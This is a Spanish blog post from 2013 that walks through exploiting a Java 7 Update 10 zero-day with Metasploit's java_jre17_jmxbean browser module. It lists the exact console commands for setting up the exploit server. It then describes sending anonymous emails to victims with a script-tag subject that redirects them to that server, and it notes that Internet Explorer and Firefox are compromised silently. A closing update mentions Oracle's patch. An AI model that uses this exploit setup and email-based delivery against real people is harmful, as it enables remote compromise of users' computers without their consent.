Metasploit por su parte acaba de incluirla en su rama gratuita, así que probaremos que tal funciona sobre la última versión de java disponible, Java 7 Update 10 (a día de hoy 13/01/2013).
Lo primero que he hecho ha sido actualizar el navegador y el plugin de java a las últimas versiones de cada uno:
Para, acto seguido lanzar metasploit y ejecutar un msfupdate para tener nuestro framework a la última con el exploit de java en su base de datos.
Lo siguiente es escoger el exploit y configurarlo:
use exploit/multi/browser/java_jre17_jmxbean
Establecemos la IP del servidor (la nuestra):
set SRVHOST <IP>
el puerto:
set SRVPORT <puerto>
y lanzamos el exploit:
exploit
En este momento el servidor se quedará esperando conexiones y nos ofrecerá una dirección que será la que las víctimas accederán.
¿Cómo difundimos el enlace?
Dicha vulnerabilidad sigue estando vigente, y es perfecta para que un atacante la aprovechase, así que terminal en mano vamos a mandar un correo de forma ANÓNIMA a una víctima (o varias) con un asunto adaptado para tal magnifica ocasión:
Subject:<script>document.location="dirección_facilitada_por_metasploit"</script>
Cada receptor del correo, será redirigido automáticamente a la dirección del servidor de Metasploit y éste hará su trabajo:
Mención "especial" por decirlo de alguna manera a Google-Chrome que muestra una advertencia referente a un plugin de Java que quiere ejecutarse preguntándonos si lo permitimos o no. En el caso de IE y Firefox éstos callan como putas y son comprometidos.
Fuente / Más información
- Nuevo 0day en Java -- S21sec Blog
- Java Zero-Day Analysis -- Packet Storm
- Vulnerabilidad crítica detectada en Java 1.7: pasos para prevenir problemas -- Genbeta
Actualización => Desde ayer (13/01/2013) existe un parche por parte de Oracle ("Update 11") que corrige el fallo, ACTUALIZAD!!
Y aquí cierro mi particular versión sobre la esta peligrosa vulnerabilidad relacionada con la ultima versión de Java, nos leemos despues y se vale comentar ;)
Publicar un comentario